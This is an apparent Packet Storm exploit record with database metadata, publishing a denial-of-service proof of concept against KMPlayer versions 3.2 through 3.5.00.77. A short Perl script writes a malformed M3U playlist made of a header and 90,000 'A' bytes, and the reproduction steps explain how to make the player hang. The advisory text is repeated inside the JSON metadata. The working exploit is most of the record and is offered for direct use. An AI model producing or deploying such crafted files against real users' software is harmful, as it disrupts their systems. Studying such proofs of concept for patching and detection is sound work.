ID PACKETSTORM:119833 Type packetstorm Reporter Jigsaw Modified 2013-01-25T00:00:00
Description
`Title : KMPlayer (PlayList M3U) Denial Of Service PoC All Versions
Author : Jigsaw (Abdelmorite Eljoaydi)
Date : 26-01-2013
E-mail : jigsaw0658@gmail.com
Home : Morroco
Facebook page : facebook.com/abdelmorit.alma
platform : software
Impact : Denial Of Service
Tested on : KMPlayer (http://www.kmpmedia.net/) Version 3.2-3.3-3.4 and 3.5.00.77
OS : Tested on Windows XP SP1,SP2 and SP3 'Windows 7 is not Vulnerable' other OS maybe Vulnerable
Risk : Low[+] / Medium[-]
====How to reproduce====
When creating a file with the poc below , you'll have to open the playlist file in kmplayer , a box will pop up just press OK . After that press the play button to trigger the DOS vulnerability . The program will not be able to respond until the process is killed using the task manager .
=========Proof of concept===========
#!/usr/bin/perl
my $j = "\x41" x 90000;
my $h = "\x4D\x33\x55";
my $file = "kmplayer.m3u";
open ($File, ">$file");
print $File $h.$j;
close ($File);
====================================
`
{"edition": 1, "title": "KMPlayer 3.5.0.77 Denial Of Service", "bulletinFamily": "exploit", "published": "2013-01-25T00:00:00", "lastseen": "2016-11-03T10:29:26", "history": [], "modified": "2013-01-25T00:00:00", "reporter": "Jigsaw", "hash": "59da067fb66aa429627e3b40b1c29c604c10304bba081ae21b5b997bce97642e", "sourceHref": "https://packetstormsecurity.com/files/download/119833/kmplayer-dos.txt", "viewCount": 0, "href": "https://packetstormsecurity.com/files/119833/KMPlayer-3.5.0.77-Denial-Of-Service.html", "description": "", "type": "packetstorm", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "a650154c8c0a9ef1e39d391934892db9"}, {"key": "modified", "hash": "4ca81cc35f2a7dd4807f32c676be405f"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "4ca81cc35f2a7dd4807f32c676be405f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "206b95ac8a1f031cb6f742792745790d"}, {"key": "sourceData", "hash": "48f8194380b25cd1b80976b695886c30"}, {"key": "sourceHref", "hash": "8097ae3605d3074e80743b9bb2ff0e85"}, {"key": "title", "hash": "516f4e4f8bf1d8e051364153dc4b343e"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-11-03T10:29:26"}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:26"}, "vulnersScore": 0.2}, "sourceData": "`Title : KMPlayer (PlayList M3U) Denial Of Service PoC All Versions \nAuthor : Jigsaw (Abdelmorite Eljoaydi) \nDate : 26-01-2013 \nE-mail : jigsaw0658@gmail.com \nHome : Morroco \nFacebook page : facebook.com/abdelmorit.alma \nplatform : software \nImpact : Denial Of Service \nTested on : KMPlayer (http://www.kmpmedia.net/) Version 3.2-3.3-3.4 and 3.5.00.77 \nOS : Tested on Windows XP SP1,SP2 and SP3 'Windows 7 is not Vulnerable' other OS maybe Vulnerable \nRisk : Low[+] / Medium[-] \n \n====How to reproduce==== \nWhen creating a file with the poc below , you'll have to open the playlist file in kmplayer , a box will pop up just press OK . After that press the play button to trigger the DOS vulnerability . The program will not be able to respond until the process is killed using the task manager . \n \n=========Proof of concept=========== \n#!/usr/bin/perl \nmy $j = \"\\x41\" x 90000; \nmy $h = \"\\x4D\\x33\\x55\"; \nmy $file = \"kmplayer.m3u\"; \nopen ($File, \">$file\"); \nprint $File $h.$j; \nclose ($File); \n==================================== \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "id": "PACKETSTORM:119833"}
